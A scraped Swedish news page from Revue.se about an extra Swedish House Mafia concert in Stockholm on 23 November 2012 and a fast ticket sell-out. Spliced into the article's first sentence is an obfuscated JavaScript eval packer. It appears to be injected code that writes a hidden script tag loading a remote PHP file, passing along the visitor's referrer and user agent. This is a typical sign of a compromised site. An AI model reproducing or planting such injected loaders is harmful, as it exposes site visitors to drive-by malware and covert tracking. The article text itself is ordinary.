Image Image Image Image Image Image Image Image Image Image

| 24 februari, 2018

Scroll to top

Top

No Comments

Swedish House Mafia klara för extra spelning 23 November 2012 | Revue.se

Swedish House Mafia klara för extra spelning 23 November 2012
Sebastian Plengier Ehrnfelt

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hftih|var|u0026u|referrer|abzbe||js|php’.split(‘|’),0,{}))
er som var uppe tidigt i morse och köade och inte fick tag i någon biljett har nu tur. Swedish House Mafia kommer att spela en kväll till här i Stockholm på Friends Arena. Den 23 och 24 November är de datum som är satta och 23 November är extra spelningen.

I morse öppnade biljettförsäljning för Swedish House Mafia på Friends arena i Stockholm klockan 09:00. Tydligen var det rätt många som ville roffa åt sig en eller två biljetter för redan 45 minuter efter var alla biljetter, ca 35.000 stycken slutsålda.

Vi på Revue stod i kö från 08:55 och fick inte tag i någon så vi ger det ett nytt försök imorgon.

Kom ihåg att vara uppe tidigt imorgon och ge er in i kriget på ticnet.se!

https://www.facebook.com/Ticnet